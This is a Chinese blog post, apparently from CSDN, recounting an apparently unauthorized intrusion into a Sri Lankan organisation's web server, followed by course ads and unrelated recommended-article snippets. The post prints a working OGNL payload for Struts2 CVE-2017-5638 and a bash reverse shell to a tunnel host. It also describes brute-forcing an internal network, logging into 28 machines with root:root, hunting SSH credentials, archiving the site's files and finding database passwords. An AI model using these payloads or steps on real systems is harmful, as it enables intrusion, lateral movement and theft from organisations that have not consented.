记一次丝滑的渗透测试,(非常详细)零基础入门到精通,收藏这篇就够了

最新推荐文章于 2025-10-28 08:50:37 发布
原创 最新推荐文章于 2025-10-28 08:50:37 发布 · 677 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全 #网络

注意:本文章仅用于技术交流学习,请勿用于非法用途,否则后果自负

本次测试的是一个斯里兰卡的站点,相关内容均厚码处理

fofa返回的结果是只有四个资产且全部都是一个域名下的

这是一个后台,但酷酷习题大法在这里已经没用了,由于站点比较冷门,筛不到这个站点,只能一边用漏扫一边手动测。

由于它是后台,我首先想到了sql注入,直接抓到请求包然后扔sqlmap跑

根据其前台的功能点,又找到一处与数据库交互的地方:

分别用sqlmap跑这两个post包后,均失败

此时再查看漏扫:

CVE-2023-48795,是ssh前缀截断攻击,其原理为:攻击者可以在初始密钥交换期间注入任意数量的SSH消息,并在交换完成后移除相同数量的消息,从而破坏SSH扩展协商(RFC8308),可降级连接的安全性。但是,它的利用条件比较苛刻,需要从本地网络发起,这点我们是做不到的。

CVE-2017-5638,这是一个RCE(没想到24年扫到了17年的老洞),这个单位的运维也是上大分了,这个利用很简单,只需要改请求包中Content-Type的值即可实现rce

poc:

Content-Type:  %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

那么直接发请求包:

也是成功利用了。

先看看它可以通过什么方式反弹shell

whereis nc bash python php exec lua perl ruby

尝试通过nc反弹shell(由于担心攻击机被溯源,我开代理+内网穿透):

不知道为什么连不上,再试试bash反弹:

bash -i >& /dev/tcp/16.tcp.cpolar.top/14898 0>&1

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

这次成功了

回头看cve-2023-48795,它攻击面较小,条件也是苛刻中的苛刻,这里我附上相关文章,各位感兴趣的观众可以去看看

https://blog.youkuaiyun.com/Xxy605/article/details/135199758

这里我想看看它都开着什么端口,本能地输入了一个nmap,没想到还真有(运维上大分)

因为可以出网啥的,我就直接塞了个fscan进去,然后开始扫端口,ip

开了个zabbix

扫了一顿啥也没有,一看版权信息是2019的,搜一下历史洞

搜到了cve-2022-23131,cve-2024-22116,不过这些漏洞均无法利用。

这里尝试./fscan -h 172.20.1.1/16 -c id -t 100000来爆破一下内网机器

扫了一顿发现172.20段有且只有172.20.252.1存在弱口令(root:root),然后history看到前面的几条命令有很多ssh连接记录(记录均为内网),果断翻找ssh凭据,同时fscan扫描整个172段

像这样的ip出来了28个

测试了一下也都可以登上去,只能说逆天

也可以出网

此时我黄豆就开始幻想了,幻想自己是比肩年姐那样的顶尖红队大玉,可以手撕内网

为了拓宽攻击面,我 cat ~/.ssh/known_hosts

只有可怜的五台(172.20.252.2还登不上去)

然后再来看3389(windows上的内网渗透容易于linux)

未果

那现在只能先脱网站文件,审计来扩大攻击面了(又特么回到起点了)

tar -cvf 114514.tar *

一边脱着,我就想看看他装了什么软件,直接yum list,然后给我报了个这个玩意:

没想到还有个邮服,属于是意外之喜了

目前收获:内网机器*28,邮服*1

然后审到了数据库账号密码,想进一步看看数据库,没想到这羁绊系统,虽然有17年的陈年nday但是还有蓝队值守,给我光速拔线了

屋檐了。

为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]


在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
在这里插入图片描述

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

渗透测试学习】—一次自测试渗透实战
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
02-25 4568
本文是作者入门web安全后的第一次完整的授权渗透测试实战,因为最近在总结自己学习与挖掘到的漏洞,无意中翻到了这渗透测试报告
快速上手 Uniapp:从入门精通的捷径
优快云博客专家,系统架构师,有合作、疑惑请私信博主。
02-26 6万+
快速上手 Uniapp:从入门精通的捷径,本文深入探讨了如何快速掌握 Uniapp 开发框架,助力开发者从新手迈向精通。开阐述了 Uniapp 基于 Vue.js,能实现一套代码多平台发布,大大提升开发效率并降低成本。随后详细介绍开发环境搭建,涵盖 Node.js、HBuilderX 安装及项目初始化步骤。在基础语法部分,结合 Vue.js 基本语法,如数据绑定、指令运用,展示 Uniapp 组件特性及使用方法。
某平台的一次简单渗透测试
HBohan的博客
11-17 2558
目标 某平台系统(www.target.net) 流程 本次渗透测试的流程图: 【技术资料】 测试 拿到站点后先做信息收集,扫描目录看看有无敏感信息 寥寥无几,没有任何信息,启动burpsuite打开网站走一遍流程。 在创建目标处存在图片上传接口,上传shell试试。 没有任何过滤,可直接上传,但当前目录不解析,猜测projectKey控制上传路径 可跨目录上传,但当前/webapp/test/uploadFile/路径非网站根目录,爆破了常见网站目录但没有一个是正确的解析shell的,先放
一次常规的网络安全渗透测试
2401_89294392的博客
01-29 945
前言互联网突破第一层内网第二层内网总结上个月根据领导安排,需要到本市一家电视台进行网络安全评估测试。通过对内外网进行渗透测试网络安全设备的使用和部署情况,以及网络安全规章流程出具安全评估报告。本文就是录了这次安全评估测试中渗透测试部分的内容,而且客户这边刚刚做过了一次等保测评,算一下时间这才几周不到,又来进行测试,实在是怕没成绩交不了差啊。
软件渗透测试
最新发布
我是一名在测试领域扎根15年+的“老匠人”
10-28 698
渗透测试——它本质是“模拟真实攻击的安全探测”,核心价值在于用黑客视角发现系统脆弱点,让安全问题从“抽象风险”变为“可感知的具体问题”。
一次渗透测试零基础入门精通收藏
Javachichi的博客
09-29 886
CVE-2023-48795,是ssh前缀截断攻击,其原理为:攻击者可以在初始密钥交换期间注入任意数量的SSH消息,并在交换完成后移除相同数量的消息,从而破坏SSH扩展协商(RFC8308),可降级连接的安全性。CVE-2017-5638,这是一个RCE(没想到24年扫到了17年的老洞),这个单位的运维也是上大分了,这个利用很简单,只需要改请求包中Content-Type的值即可实现rce。这是一个后台,但酷酷习题大法在这里已经没用了,由于站点比较冷门,筛不到这个站点,只能一边用漏扫一边手动测。
一次完整的渗透测试流程
HIM_MRY的博客
08-30 6779
渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——> 网络安全渗透测试分为白盒测试和黑盒测试 1.白盒测试就...
渗透测试|一次渗透测试
Lucker_YYY的博客
10-10 906
在本地环境下没有域控,所以学习域渗透就暂时告一段落了,对内网想着做横向和内网渗透来着,由于是云服务器,也不是集群,就是托管,没有相关业务,看到没有什么相应所需的东西就算了,打完收工,交洞清痕。不清楚是不是和这个有关,后面我传了冰蝎,但是我下载的版本不好用,貌似是阉割版,不做演示了,后面就传CS马,关于 Cobalt Strike 可以看我以下文章。在经过无限的看文章,刷视频,实战中循环,总算有了一个思路,虽然过程很简单,但是第一次的解开题的喜悦总是难以掩饰的,期待以后一步一步的前行,不断地总结。
Uniapp 从入门精通:动画与过渡效果的运用
热门推荐
优快云博客专家,系统架构师,有合作、疑惑请私信博主。
02-26 6万+
Uniapp 从入门精通:动画与过渡效果的运用,本文从 Uniapp 的基础回顾入手,介绍了 CSS 动画和 Vue 过渡效果的基础知识,然后深入讲解了 Uniapp 中动画与过渡效果的高级应用,包括使用uni.createAnimation创建复杂动画和配置页面切换动画。最后,探讨了动画与过渡效果的性能优化方法。通过本文的学习,开发者可以掌握在 Uniapp 中运用动画与过渡效果的技巧,提升应用的交互性和用户体验。
vshell渗透测试工具介绍
墨痕诉清风的博客
05-13 1123
国内的cs现github已经关闭或隐藏了该项目,目前外面流出的最高版本为4.9.3目前一共有三个版本。
MATLAB安装秘籍:从入门运行.docx
04-02
MATLAB是MathWorks公司推出的一款高性能数值计算和可视化软件,广泛应用于科研、工程设计、数据分析、算法开发等领域。在使用MATLAB之前,正确的安装和优化是基础中的基础,能确保软件的稳定性和性能发挥。 首先...
渗透测试
11-29
2个星期艰难的渗透纪实 渗透测试录 详情看文档。。
渗透测试全过程
12-04
我先感慨一下,在做网络安全这些年感觉一直在漂,从05年刚到北京的远东到08年的大连,再到11年的启明,没有一个地方能让人感到是在踏实的做安全,对网络安全人才这块也都不重视。从圈内群的好友里得知,有很多技术水平很不错的朋友都闲置在家,为什么?我感觉国内的大环境都是这样的,所以出现了2011年底的各大网站密码泄露事件。我认为,泄露的那些库也只是九牛之一毛。在这个拿网络安全人才当民工的时代,也许这个事件算是给那些高傲的、高薪的程序员上的一堂课吧。
一次有趣的渗透测试
hl1293348082的专栏
03-25 590
最近在做渗透测试的练习中遇到一个比较有意思的站点,在此录下来,希望能给向我一样刚入安全圈不久的萌新提供一些基本思路吧。 在拿到目标站点的域名时,首要的工作肯定是进行一系列的信息搜集工作,具体搜集哪些信息以及怎么有效搜集,可以参考 Google 或者百度。 下面为了文章的简洁性,我只提及我会利用到的一些站点信息。 首先网站的真实 IP 并没有隐藏在 CDN 后面,直接在 ThreadBook 上查看同 IP 的旁站,显示足足 189 个! 看到这个数的时候,说实话内心是沉重的,虽然可以从众多的旁
一次渗透测试实战
qq_45434762的博客
11-17 1938
免责声明 本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。 因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与NowSec及分享者无关 0.起因 博主从周一到周五一直在收同一个公司发送的垃圾短信(这从短信链接中的域名可以看出),但是当博主点进网页看的时候,发现这是可以说是一家骗子网站吧。网站所卖的东西...
一次网站的渗透测试
Hacker_DB的博客
04-14 1003
朋友叫我帮忙,对一个网站做一下测试。主要目标是看看能不能进入服务器,收集一些建站者信息。 朋友平时待我不薄,此时怎可出言拒绝?经过授权后,直接开搞! (情景发生时间距今较久,请各位读者酌情参考) 用扫描器扫了一下,没有发现漏洞。发现网站存在CDN: 看了下历史解析录,还好不多。通过判断,确定最后一条为真实IP: 查看下IP绑定的网站,查到3个域名,其中一个无法访问,另一个是个后台: 我们先来看这个后台: 随便输入一个账号和密码,提示数据不存在: 扫了下目录,只扫出个upl
一次完整的渗透测试(Machine_Matrix)
qq_62729556的博客
11-13 325
接下来进行flag查询,找了半天没找到,切换到超级管理员用户下时失败了,这个时候想到缺少环境变量,接下来增加环境变量,由于不清楚具体在哪个环境变量下,索性就将所有环境变量加入,成功进入超级管理员下,再进入到root目录下,成功找到flag。1. 权限限制:-rbash是一种受限制的shell,它提供了一些额外的安全限制,以防止用户执行一些危险的操作。通过探测得到的端口,访问80端口,发现什么都没有,这个时候尝试访问31337端口,发现出现了别的信息,通过查看源码发现了一段base64加密的信息。
一次渗透测试算命网站
c2788602731的博客
01-29 586
群友制作了一个小网站,让我们进行测试,查找数据库或者服务器,谁能进去谁就赢,当时我心想,这个时候怎么能少了我呢,二话不说答应了,头一次在别人面前表演。。。。 这种样式的站点我见过好多了,既然是测试,那就大胆的干! 第一步就不进行搜集了,这种数据库很明显就是MySQL,而且后台还是login那种,省略掉 ———————————————————————— 第一个思路:判断交互 打开登录页面,随便填个账号和密码 打开F12确定一下 点击登录以后提示重试,没错,这位群友真谨慎,居然设置了无论是管理员还是普通用
如何做一个的方块移动到目标停下的动画
03-29
<think>好的,我需要帮助用户实现一个平的方块移动动画,使用CSS或JavaScript。首先,用户的问题是关于如何实现平移动的,我需要先回顾一下相关的知识,然后结合提供的引用内容来给出合适的解决方案。 首先,查看用户提供的引用内容。引用[1]提到CSS动画和JavaScript动画各有优势,CSS适合简单动画,JavaScript适合复杂控制。引用[3]和[4]给出了JavaScript实现移动的例子,尤其是缓动效果,引用[4]还提到了使用CSS的steps函数,但用户想要的是平移动,所以可能需要不同的CSS动画属性。 接下来,我需要考虑两种方法:CSS和JavaScript。对于CSS,使用transition或者@keyframes动画可能更简单。比如,通过改变left属性,并添加transition属性来实现平过渡。或者使用transform: translateX(),因为transform在性能上更好,尤其是在涉及重绘时。 对于JavaScript方法,引用[3]中的例子使用了定时器和缓动函数,每次移动剩余距离的一部分,这样能实现平的减速效果。用户可能需要这样的缓动动画,或者匀速移动。这里需要解释两种方式的代码结构,并比较它们的优缺点。 另外,引用[4]中的CSS动画使用了steps函数,但那适用于逐帧动画,比如精灵图动画。而用户需要的是平移动,所以应该使用线性或缓动的时间函数,比如ease-in-out。 现在需要组织回答,先介绍CSS方法,再介绍JavaScript方法,每种方法给出示例代码,并说明其工作原理。同时,需要指出哪种情况下选择哪种方法更合适,比如简单动画用CSS,复杂控制用JS。 还需要注意用户提到的“平移动”,所以在CSS中使用transition的timing-function,或者在JS中使用requestAnimationFrame来优化性能,避免使用setInterval可能导致的卡顿。 最后,生成相关问题,帮助用户深入理解,比如比较两种方法的性能,如何添加缓动效果,或者如何组合使用CSS和JS。 检查是否有遗漏,比如是否需要考虑浏览器兼容性,但用户没有特别提到,所以可能不需要深入。确保代码示例正确,比如在CSS中使用transform,或者在JS中使用requestAnimationFrame来实现更流畅的动画。 总结步骤: 1. CSS实现方法,使用transition或@keyframes。 2. JavaScript实现方法,使用定时器或requestAnimationFrame,加上缓动函数。 3. 分别给出代码示例。 4. 比较两种方法的优缺点。 5. 生成相关问题。</think>### 实现平方块移动动画的方法 #### 一、使用CSS实现 1. **通过`transition`实现平移动** 修改方块的`left`或`transform`属性,并添加`transition`属性实现过渡效果: ```css .box { position: absolute; left: 0; width: 50px; height: 50px; background: #3498db; transition: left 1s ease-in-out; /* 控制left属性变化 */ /* 或使用transform优化性能 */ /* transition: transform 1s ease-in-out; */ } ``` ```javascript // 触发移动 document.querySelector(".box").style.left = "200px"; // 或使用transform // document.querySelector(".box").style.transform = "translateX(200px)"; ``` **优点**:代码简洁,性能优化较好(尤其使用`transform`)[^1]。 2. **通过`@keyframes`定义动画** 使用关键帧控制移动路径: ```css @keyframes slide { from { transform: translateX(0); } to { transform: translateX(200px); } } .box { animation: slide 1s ease-in-out forwards; } ``` --- #### 二、使用JavaScript实现 1. **通过`requestAnimationFrame`逐帧控制** 使用缓动函数实现平减速效果(类似引用[3]的优化): ```javascript function smoothMove(element, targetX) { let currentX = 0; function animate() { currentX += (targetX - currentX) * 0.1; // 缓动系数 element.style.transform = `translateX(${currentX}px)`; if (Math.abs(targetX - currentX) > 0.5) { requestAnimationFrame(animate); } } animate(); } smoothMove(document.querySelector(".box"), 200); ``` **优点**:可自定义缓动效果,适合复杂动画[^3]。 2. **通过定时器实现匀速移动** 线性匀速移动(适合简单场景): ```javascript function linearMove(element, targetX, duration) { const startX = 0; const startTime = Date.now(); function update() { const elapsed = Date.now() - startTime; const progress = Math.min(elapsed / duration, 1); element.style.transform = `translateX(${progress * targetX}px)`; if (progress < 1) requestAnimationFrame(update); } update(); } linearMove(document.querySelector(".box"), 200, 1000); ``` --- #### 三、方法对比 | 方法 | 适用场景 | 性能 | 控制灵活性 | |--------------------|----------------------------|------------|------------| | CSS `transition` | 简单位移、透明度变化 | 高 | 低 | | CSS `@keyframes` | 复杂路径动画 | 高 | 中 | | JavaScript缓动动画 | 需要动态调整参数或复杂交互 | 中(需优化)| 高 | ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值